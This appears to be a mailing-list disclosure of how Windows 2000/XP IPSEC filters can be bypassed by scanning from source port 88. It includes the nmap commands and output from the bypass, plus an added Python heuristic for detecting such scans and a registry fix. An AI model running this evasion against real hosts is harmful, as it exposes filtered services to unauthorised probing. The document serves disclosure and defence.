Hi folks,

As a result of a recent Windows host hardening engagement, I came across this little trick and thought it might be useful at some point. The Microsoft IPSEC filters used by Windows 2000 & XP can be bypassed by choosing a source port of 88 (Kerberos).

First off, Microsoft themselves state that IPSEC filters are not designed as a full featured host based firewall [1], and it is already known that certain types of traffic are exempt from IPSEC filters [2]. They can be summarised as:

* Broadcast
* Multicast
* RSVP
* IKE
* Kerberos

In a Microsoft support note [2] there is the line: "The Kerberos exemption is basically this: If a packet is TCP or UDP and has a source or destination port = 88, permit."

The test host's rule was created using:

ipsecpol.exe -x -w reg -p "the black knight" -r "noneshallpass" -n block -f 0=*::*

Normal nmap scan:

# nmap -sS -v -v -P0 --initial_rtt_timeout 10 --max_rtt_timeout 20 172.25.0.14

Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-05-19 18:14 BST
Host 172.25.0.14 appears to be up ... good.
Initiating SYN Stealth Scan against 172.25.0.14 at 18:14
The SYN Stealth Scan took 7 seconds to scan 1659 ports.
Interesting ports on 172.25.0.14:
(The 1658 ports scanned but not shown below are in state: filtered)
PORT   STATE  SERVICE
88/tcp closed kerberos-sec

Nmap run completed -- 1 IP address (1 host up) scanned in 7.017 seconds

Port 88 closed is the hint. Nmap again, using this as the source port:

# nmap -sS -v -v -P0 -g 88 --initial_rtt_timeout 10 --max_rtt_timeout 20 172.25.0.14

Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-05-19 18:14 BST
Host 172.25.0.14 appears to be up ... good.
Initiating SYN Stealth Scan against 172.25.0.14 at 18:14
Adding open port 445/tcp
Adding open port 135/tcp
Adding open port 139/tcp
Adding open port 1433/tcp
Adding open port 1027/tcp
Adding open port 1025/tcp
The SYN Stealth Scan took 0 seconds to scan 1659 ports.
Interesting ports on 172.25.0.14:
(The 1653 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1027/tcp open  IIS
1433/tcp open  ms-sql-s

Nmap run completed -- 1 IP address (1 host up) scanned in 0.367 seconds

As can be seen, the IPSEC filters are bypassed.
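As an added example (not part of the original post), the following Python shows how a defender could spot this bypass on the wire. It encodes the observation that real Kerberos traffic never arrives as a bare TCP SYN from source port 88, nor as a UDP datagram from port 88 to a well-known service port, and runs that heuristic over a constructed set of packet records. The Packet class, the 1023/1024 well-known vs. ephemeral split, and all addresses and ports are assumptions of the example, chosen to mirror the scan in the post.

```python
"""Detection heuristic for abuse of the Windows 2000/XP IPSEC Kerberos exemption.

A genuine Kerberos client reaches port 88 on the KDC from an ephemeral source
port, and a KDC never initiates a connection from port 88. So an inbound TCP SYN
(without ACK) carrying source port 88 toward some other service port, or a UDP
datagram from source port 88 to a well-known non-Kerberos port, has no benign
explanation and matches the source-port-88 scan shown in the post.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set

KERBEROS_PORT = 88
WELL_KNOWN_MAX = 1023  # assumption: ports <= 1023 are service ports, above are ephemeral


@dataclass(frozen=True)
class Packet:
    """Minimal packet record (hypothetical); a real deployment fills it from pcap/IDS."""
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: str          # "tcp" or "udp"
    syn: bool = False   # TCP flag bits; ignored for udp
    ack: bool = False


def abuses_kerberos_exemption(pkt: Packet, protected_hosts: Set[str]) -> bool:
    """True when pkt looks like the exemption being used to reach a filtered service."""
    if pkt.dst_ip not in protected_hosts:
        return False
    if pkt.src_port != KERBEROS_PORT or pkt.dst_port == KERBEROS_PORT:
        return False                          # exemption not in play, or real Kerberos
    if pkt.proto == "tcp":
        return pkt.syn and not pkt.ack        # a KDC reply is SYN/ACK, never a bare SYN
    if pkt.proto == "udp":
        return pkt.dst_port <= WELL_KNOWN_MAX  # KDC UDP replies go to ephemeral ports
    return False


def find_scanners(packets: Iterable[Packet], protected_hosts: Set[str]) -> Dict[str, Set[int]]:
    """Group flagged packets by source address; many distinct destination ports
    from one source is the fingerprint of a port scan run with source port 88."""
    hits: Dict[str, Set[int]] = {}
    for pkt in packets:
        if abuses_kerberos_exemption(pkt, protected_hosts):
            hits.setdefault(pkt.src_ip, set()).add(pkt.dst_port)
    return hits


def alerts(packets: Iterable[Packet], protected_hosts: Set[str], min_ports: int = 1) -> List[str]:
    """Render one alert line per offending source that touched at least min_ports ports."""
    out: List[str] = []
    for src, ports in sorted(find_scanners(packets, protected_hosts).items()):
        if len(ports) >= min_ports:
            out.append(f"{src}: source port 88 used toward filtered ports {sorted(ports)}")
    return out


# Constructed sample traffic: 172.25.0.14 is the hardened host, 10.0.0.5 its KDC.
PROTECTED = {"172.25.0.14"}
SAMPLE = [
    # legitimate Kerberos exchange: the host uses an ephemeral port, the KDC replies from 88
    Packet("172.25.0.14", 3456, "10.0.0.5", 88, "tcp", syn=True),
    Packet("10.0.0.5", 88, "172.25.0.14", 3456, "tcp", syn=True, ack=True),
    Packet("10.0.0.5", 88, "172.25.0.14", 3457, "udp"),
    # ordinary scan from an ephemeral source port: the block filter already drops this
    Packet("172.25.0.99", 40000, "172.25.0.14", 445, "tcp", syn=True),
    # scan that sets source port 88, as in the post: these reach the services
    Packet("172.25.0.99", 88, "172.25.0.14", 135, "tcp", syn=True),
    Packet("172.25.0.99", 88, "172.25.0.14", 139, "tcp", syn=True),
    Packet("172.25.0.99", 88, "172.25.0.14", 445, "tcp", syn=True),
    Packet("172.25.0.99", 88, "172.25.0.14", 137, "udp"),
]

if __name__ == "__main__":
    for line in alerts(SAMPLE, PROTECTED):
        print(line)
```

Run as a script it prints a single alert for 172.25.0.99 listing ports 135, 137, 139 and 445, while the genuine KDC replies to the hardened host produce nothing. Detection is only the second line: on the host itself the exemptions can be switched off with the NoDefaultExempt value under the IPSEC service's registry key, a Microsoft-documented setting that the post does not mention.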